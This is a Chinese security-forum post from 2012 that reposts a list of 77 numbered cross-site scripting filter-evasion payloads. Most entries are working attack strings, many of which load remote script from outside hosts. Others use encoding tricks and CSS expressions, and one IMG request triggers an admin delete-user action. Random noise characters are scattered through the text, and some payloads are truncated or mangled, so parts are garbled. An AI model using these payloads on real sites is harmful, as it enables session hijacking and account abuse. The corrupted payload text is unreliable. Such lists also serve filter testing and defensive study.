貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
% g9 c$ Q/ _6 J! x# ?- R1 {- E+ u4 U7 y! k' K7 n2 q8 s/ g
(1)普通的XSS JavaScript注入+ J0 ]) |9 \9 H/ k
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
4 r# w/ l" s- u; {% S
1 U7 ~) u: w' D4 |; h( J, e (2)IMG标签XSS使用JavaScript命令# V( m( R3 t3 [, m8 n
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
8 U+ E* Y$ ]& }
2 G' O; Y, w& V1 p% t! `7 e% M (3)IMG标签无分号无引号
3 M/ T2 w0 [- W2 i; ~ <IMG SRC=javascript:alert(‘XSS’)>( Y3 X! V$ p+ @* y7 N- r
9 @- n2 k9 ?3 \- w& W( A( j4 X
(4)IMG标签大小写不敏感8 y7 k) l, N2 A. r- E' N1 V
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
6 c4 |& P5 J( R* }, j' [
' ` ]% Y/ C2 ? (5)HTML编码(必须有分号)
3 y5 w% `+ Y; c$ \; y4 i2 i <IMG SRC=javascript:alert(“XSS”)>
7 X! @! E+ L. W% j6 w% ^' {& \5 B( y/ @7 Z+ w
(6)修正缺陷IMG标签7 h& X% ?2 ?6 y+ ]) }' k+ a
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
7 T, V8 p5 w; x5 s! ~9 |8 P* j* _3 L; _2 }* y# p* Z
(7)formCharCode标签(计算器)
& ^' w+ q; g3 k( e$ a <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
4 _0 L z9 v% v2 ~4 K+ D6 e$ @9 r8 d8 L2 X m
(8)UTF-8的Unicode编码(计算器)/ E. h* e3 N/ n1 Y: f
<IMG SRC=jav..省略..S')>
( n: t8 P5 G5 T, J/ u
* Z& ]: W& x( K; n2 ^. ^ (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
0 _4 y+ Y8 s3 S" K& F <IMG SRC=jav..省略..S')>
$ T# q6 {' I* M0 h! F. R
! ?3 @$ }9 t4 D( j4 F1 { y, \: y (10)十六进制编码也是没有分号(计算器)
5 v/ v C% m# C5 x+ Q1 d4 Z" \ <IMG SRC=java..省略..XSS')>
5 f6 g+ E" Y* |9 m; _$ S3 ]6 _% ^7 g/ o0 S$ x% G( L: s) _
(11)嵌入式标签,将Javascript分开! [% `6 U. E1 b5 Z
<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 Z# w7 N( P- l$ E }) A6 p& L( [; f, z
2 E. h2 V) i; d8 n& R$ Z (12)嵌入式编码标签,将Javascript分开# X4 C1 M# C& N
<IMG SRC=”jav ascript:alert(‘XSS’);”>
( v- Z* q9 n: r# R" o
4 L/ t* T6 p: u0 ^ (13)嵌入式换行符8 f8 Z2 N4 W5 `: ?% i
<IMG SRC=”jav ascript:alert(‘XSS’);”>
9 h/ ?# ~ P- U `; [4 L6 [6 S& L0 v% S p: x
(14)嵌入式回车
4 w% N* U5 C' W' n <IMG SRC=”jav ascript:alert(‘XSS’);”>
( w5 `8 ~* p; f; \; d% a3 Q) v7 l2 ?; B! S$ A% J3 q
(15)嵌入式多行注入JavaScript,这是XSS极端的例子, d9 w+ O9 D7 _8 v- z
<IMG SRC=”javascript:alert(‘XSS‘)”>
R- Q3 j3 ^ x# E+ A4 J7 \" u4 o3 u& J" [- k
(16)解决限制字符(要求同页面); V; u- ?& @( o* n" o
<script>z=’document.’</script>
# z+ r. B# F' }3 W <script>z=z+’write(“‘</script>; s J! e$ S- Y7 Y' N
<script>z=z+’<script’</script>
. ~0 s, i6 o) `/ W <script>z=z+’ src=ht’</script>
5 I& r3 w; D3 ]4 X. m0 l* D <script>z=z+’tp://ww’</script>
8 `8 F( B1 ?& N" l \( y$ s& { <script>z=z+’w.shell’</script>
) X7 F* b; g+ V7 K/ r <script>z=z+’.net/1.’</script>( z. ~& C6 _- p7 ]6 S$ h3 B
<script>z=z+’js></sc’</script>1 c- @1 G5 C6 c- d$ [' d: Z
<script>z=z+’ript>”)’</script>
) _7 `. @5 L) X: Y! x6 d1 ?8 n <script>eval_r(z)</script>
{7 v+ N8 R2 i/ j+ d0 H9 d( Y6 U/ C4 W9 [$ E) ?
(17)空字符
* l, n" J0 R1 m8 n! @ perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out# b, k) W1 ]3 m7 A
( _7 F. @; d, S (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
5 ^: c# a6 ~1 V9 ?; C perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out* H3 m% D2 k% {; C0 @$ n
) M; j: z) \" l8 v- _! W$ z (19)Spaces和meta前的IMG标签
- U# N3 c+ p; x- A* m! v7 M <IMG SRC=” � javascript:alert(‘XSS’);”>* J! |: t) k1 l- R
1 _/ f4 X" H, O6 u; g2 n (20)Non-alpha-non-digit XSS
8 D" }) S/ j' w2 q, o) m <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>+ D$ ~1 V+ b* a
- ~! i- {/ |4 p1 r7 F( l
(21)Non-alpha-non-digit XSS to 24 \5 V& [5 T2 y& M, n
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>/ F# q+ r5 j; X2 P* {
, M/ K, h& ?; I: N" |" Y3 Q (22)Non-alpha-non-digit XSS to 3
" M$ }5 w6 ]: o. R) h9 x9 Z <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>; T2 U, c0 O u! I1 c4 i
+ q$ q6 U5 n& { (23)双开括号- I1 B/ Y( q# O
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
# g& f1 U0 ^& t! v2 Z' q# G x5 V. r/ [$ G& u
(24)无结束脚本标记(仅火狐等浏览器)! z/ a6 ?: P5 P! y$ `4 V4 Y% L' y C1 ~
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>3 \0 b. H) g5 \2 v) h. z9 {% B' o
( _. l3 c2 R+ d4 m1 F" t5 ] ^
(25)无结束脚本标记2
9 o6 H/ C- w3 g( ]5 ] <SCRIPT SRC=//3w.org/XSS/xss.js>0 g2 ^( b. `/ u" e( S
8 h' a0 l6 i: A# L (26)半开的HTML/JavaScript XSS3 P( S7 D2 P" ], x2 d n( G# _
<IMG SRC=”javascript:alert(‘XSS’)”, j/ D+ n u" B8 n# g/ }
; _- w1 S4 _5 b( b) F! P! ? (27)双开角括号/ g$ O' z( F- Y) k3 S6 M, a0 {
<iframe src=http://3w.org/XSS.html <
0 ~7 L3 q' a1 _5 B- q. |$ X5 b0 l7 C) A! W# }- Z7 Z' l
(28)无单引号 双引号 分号$ M; \5 q* y1 F& n- Y( a
<SCRIPT>a=/XSS/2 Z4 r: h1 W9 h. R N+ ~! |
alert(a.source)</SCRIPT>
7 s* Q/ E3 m) {: B, m3 R9 M; o [1 u$ a1 D1 j
(29)换码过滤的JavaScript3 i0 t' _6 d- ?: F5 m# L
\”;alert(‘XSS’);//) \; f2 A- |9 N1 x7 k5 t* l2 W4 ~5 U
1 y. g: j8 z; H3 }2 f# O (30)结束Title标签
, e7 G5 a; K( y; e% a </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>$ D' Q9 G! y( ]7 m7 i! ?
- w3 d, J" r9 l" I# U( y. A& F
(31)Input Image
4 f/ A3 i/ O9 E; a! P0 o* ? <INPUT SRC=”javascript:alert(‘XSS’);”>
* R( a; S* G0 R* _# L8 @) t
( R- S+ j1 A. K7 O (32)BODY Image
' d$ q( ^6 a6 L5 Q/ u, A* T0 B <BODY BACKGROUND=”javascript:alert(‘XSS’)”>) J& y" C# o& H) B" t1 @, W8 W* a
0 u# V! e5 y$ ^% u2 W \' f
(33)BODY标签- \- {* j% V6 o5 L$ G, d, t2 A
<BODY(‘XSS’)>, b. x/ G' t# w: H: h) H
, H+ g! V7 o- H
(34)IMG Dynsrc: T% E" N1 k: Q% s
<IMG DYNSRC=”javascript:alert(‘XSS’)”>% w6 b3 l- e) D7 Q
: u8 _6 Q% B& C& U5 ~+ ~( H
(35)IMG Lowsrc
; I" I6 Q+ @( Y( p5 v" @" k <IMG LOWSRC=”javascript:alert(‘XSS’)”>' X: h5 t" u4 T: ` r' [ V# [
1 s, @. \3 [& b. m) t, o0 \
(36)BGSOUND0 X# c! l; w/ c2 S' j$ T
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
/ ]/ p. h* n6 O3 q8 _* U% a/ A0 J- t( E9 V
(37)STYLE sheet% } F$ c8 E# d) V
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>0 u( O+ A2 Y) D
+ J9 ?* T. Q8 U- y' x5 i
(38)远程样式表! I. y3 @9 n' T# s4 B2 o
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
; e. d( m: m4 _) _8 _" |* S# D& M
(39)List-style-image(列表式): h3 z* ]9 S4 k* p7 [
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
( }" ]' X" d0 i7 y# f" p
8 |/ k0 X9 P6 ?" z0 o (40)IMG VBscript
7 B3 l% m8 ]' g: r0 A <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
! \& f! ]* i+ [0 c8 n2 g) o
0 c6 S$ N4 D3 _: Q/ \9 y (41)META链接url1 k, Q3 X9 K6 c0 y) x9 _
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
Z: d; B! m$ {; R
4 t& T( H1 a: V0 S$ A) D (42)Iframe
% Y5 j( z3 |5 L" w6 g( G! H <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>! e: C# f) ]2 X& A( ]% O3 m
- j- e9 j- D2 h: f4 ^ (43)Frame
5 z7 [& E% ~# f' t <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
2 n D8 T5 S3 m6 P9 r
3 @* Q8 I0 H) _- X: X (44)Table
+ Q) L% @+ e- c4 C <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>8 C3 x7 e& R4 Z- {
3 X6 r, g, y4 u. \8 S0 Y4 U3 f (45)TD! C; r- Y2 v3 r8 Y# T6 I
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>% p1 z, k; e% A9 I2 Y! h) W$ a
( C3 P$ p4 H X3 |
(46)DIV background-image
0 F/ o4 v: z" p# B6 L. e: X9 ^ <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
) Z1 F4 r/ F. C' g: U' |
3 `4 z$ ^! s$ |' G9 Y Z (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
. c' M8 i v: C t, B5 X! B <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>1 E$ ]& j8 p/ U- \' g- b! U
) b5 c2 ^2 Y$ b. U8 t (48)DIV expression
9 p0 C# F# }" K4 S& u6 F8 F <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
% \8 H4 U! R* d5 D, o8 m" Q! q
6 P; g- N: W5 i7 C (49)STYLE属性分拆表达$ H0 R" N u) `/ r& m9 _
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
3 d6 T& \: S* a. |* @% B& _: k/ j7 C! A! ^
(50)匿名STYLE(组成:开角号和一个字母开头)
2 l& h9 E$ L1 p+ h7 I <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>3 d9 D" M- B$ k! u* M$ `& U
* ^7 D; G- X& q: b0 E0 u
(51)STYLE background-image* z# D3 e2 o- X2 B
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
& d/ d2 m+ m" o1 D4 w1 q. g/ D1 e/ R6 D. O/ @% J( L0 ]
(52)IMG STYLE方式
) I/ Y# r9 Z: [( G& W exppression(alert(“XSS”))’>
$ d1 M2 q' J5 X2 H% e) f; O
5 q o* K3 E' ?& m (53)STYLE background8 q+ n) h: _" y1 l( v! ?
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>3 a2 h+ m1 Y% v7 I3 f: M8 A
@: Q7 W6 K; \6 z6 m6 V' U6 v (54)BASE
) i9 f$ B. H9 S: n' I. P <BASE HREF=”javascript:alert(‘XSS’);//”>; k- \% ^3 b4 k
8 x! |2 _( I( t2 m8 Y
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS1 s+ x* w; H2 f1 M$ x
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>( u; S) e' K: t# ^+ s3 w" e% @
7 A3 N# d! V) q" i (56)在flash中使用ActionScrpt可以混进你XSS的代码
' ]/ S- s7 r% T/ V% M2 g a=”get”;
: ` i/ x: a8 p# ^. H b=”URL(\”";6 D3 N+ V# i0 {1 I4 X
c=”javascript:”;
, |# H9 }5 L- \1 j d=”alert(‘XSS’);\”)”;
* N$ A7 V+ X( w eval_r(a+b+c+d);+ r" s* K3 L9 Q& F# `) j* a- G
( Y7 n* [" }. N1 f7 {* ]/ i$ ]! ?: J
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
& a; l# {! b. G# B! h4 T7 A( ~9 y <HTML xmlns:xss>" c5 i, s$ _& y |) X, C0 P: s4 P
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
9 {- A: n( h% B, w% [; s <xss:xss>XSS</xss:xss>+ h: f9 l( z# `! W4 ~+ w
</HTML>4 U N: k6 t* ~5 y8 Q
. ~$ y' P- _1 i/ m (58)如果过滤了你的JS你可以在图片里添加JS代码来利用
2 H) A4 U5 \) x- } <SCRIPT SRC=””></SCRIPT>
0 G8 h5 M2 L& s& {$ B8 y- A! y! i% `3 P* K$ C' |
(59)IMG嵌入式命令,可执行任意命令
0 b" c* d; f$ u% ~. b <IMG SRC=”http://www.XXX.com/a.php?a=b”>
7 ~7 g9 W$ S- G. m
+ |. n2 n' E+ a0 @4 p5 J (60)IMG嵌入式命令(a.jpg在同服务器)* p" G# s" Q7 _% L$ B2 S# `
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser! d: A0 {4 F) G. P: a" d
$ `6 M) Z: Q: [( h6 }, s" J2 Q% N (61)绕符号过滤
L" M& `* p- n; E l' j( x <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
/ g, ~* F$ m0 A: a, ~9 j* m2 B
0 \2 B7 p# i, i( Q (62)
9 X# j' M* U5 w+ ^9 X0 |, i <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>* K( S. O! p0 @
5 o* G0 u. o6 \, X: [% O (63)" c/ c8 A' [2 e
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>' s$ I$ Z8 E! l2 L' z w5 q
6 C, @4 m+ F% q& ]; m: u
(64)% f; A J: L( s% ^! x0 e
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
5 p% s- Y2 v# r8 t+ `, T8 d, m( ~( G7 B) e" V6 s3 Y2 i
(65); C9 q1 Z$ t6 H# o& n: ?
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>2 Y4 Q( [, Q! p4 }7 h. {9 V- S
& Y9 K! D# F" O* F
(66)4 R/ w2 R3 Z% [& I
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>9 h9 T5 J" \- R+ ~7 e. J" m
5 S* G& Q+ E- K' j& H+ t (67)- K( @. ~. O8 N+ l! f" {2 g
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>( y' L! ]" f7 y
! ?9 L2 ?! m; b7 O% O5 t1 Z3 M; h
(68)URL绕行1 e4 U0 y6 h: b) ], c: \
<A HREF=”http://127.0.0.1/”>XSS</A>
$ M& b( [2 i W; ~
. |0 K; h% R5 ~ (69)URL编码) ]: A0 G8 q& r8 \
<A HREF=”http://3w.org”>XSS</A>
# p% h9 l; {7 V7 z" I1 l& g' Y2 \ v9 ?8 `
(70)IP十进制0 K4 R& f/ I7 C5 _$ N0 K! X4 @
<A HREF=”http://3232235521″>XSS</A>, p7 I8 l/ w8 [
! q+ P8 W+ o, e5 `! @ (71)IP十六进制
: [$ k' u2 }# M <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>2 P! q r/ b |
* ^9 u% ^( [! D' F$ G. Q' T. B (72)IP八进制 O5 S1 c5 z) x/ M* W# |6 ^
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
. K& n, T2 z( V
: c7 s, D# T$ h9 G7 u$ e" q (73)混合编码, Y- |5 y8 a' ?8 A! S: o9 R4 @ M
<A HREF=”h; m$ C$ O9 |$ u& T' z/ o
tt p://6 6.000146.0×7.147/”">XSS</A>
; y+ f D) t6 j' _8 h; e: n# _- J$ g; U9 O. W$ r9 K0 _- G; {* Z
(74)节省[http:]& q' M3 j4 Y0 g- u6 P
<A HREF=”//www.google.com/”>XSS</A>
1 p" l6 r* t5 p+ w8 \! U; ~* K# ^6 j7 |8 E$ i% d1 ^6 l
(75)节省[www]9 l P' Y! Z I/ Y: s
<A HREF=”http://google.com/”>XSS</A>
( ^2 O# l1 M- c4 P7 G, W' N1 C3 b# V+ D' R+ d5 ]. c9 P
(76)绝对点绝对DNS
) F! m! `; X* u! e <A HREF=”http://www.google.com./”>XSS</A>( F( X5 y# S- C( ?# I+ G& L( i" G
' \) ]3 ?7 q1 X" ^
(77)javascript链接
% W+ b7 ~& P [7 O2 |9 x8 }/ t <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对